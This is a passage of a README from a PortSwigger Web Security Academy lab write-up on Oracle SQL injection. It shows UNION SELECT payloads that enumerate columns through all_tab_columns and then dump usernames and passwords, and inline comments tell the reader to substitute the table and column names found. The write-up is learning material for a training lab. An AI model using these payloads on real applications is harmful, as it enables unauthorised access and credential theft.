HarshilBhuva/portswigger-websecurity-academy/01-sqli/SQL_injection_attack,_listing_the_database_contents_on_Oracle/README.md

 The [all_tab_columns](https://docs.oracle.com/en/database/oracle/oracle-database/21/refrn/ALL_TAB_COLUMNS.html#GUID-F218205C-7D76-4A83-8691-BFD2AD372B63)-table holds information about the columns of each table, specifically the `column_name` column.
 The proper string to inject is `' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'--` to form this query

+// 📝 REPLACE TABLE NAME ACCORDINGLY

  ```sql
 SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'--'`
 ```
+// 📝 NOTE DOWN THE USERNAME AND PASSWORD COLUMN NAMES YOU SEE

 ![username and password columns](img/username_and_password_columns.png)

 ### Enumerate all usernames and passwords

+// 📝 REPLACE USER, PASSWORD, AND TABLE NAME WITH THE ONES YOU FOUND ABOVE

 Now I have all information to obtain the required usernames and passwords.
 I inject `' UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB from USERS_TOAEAL--` to form this query: